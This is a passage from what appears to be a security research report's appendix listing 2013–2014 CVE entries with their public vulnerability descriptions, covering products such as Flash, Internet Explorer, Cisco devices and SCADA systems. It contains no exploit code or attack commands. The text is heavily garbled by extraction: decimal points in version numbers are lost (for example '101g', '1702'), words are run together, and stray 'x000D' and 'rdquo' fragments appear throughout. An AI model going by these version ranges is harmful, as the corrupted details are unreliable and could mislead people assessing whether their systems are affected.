CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
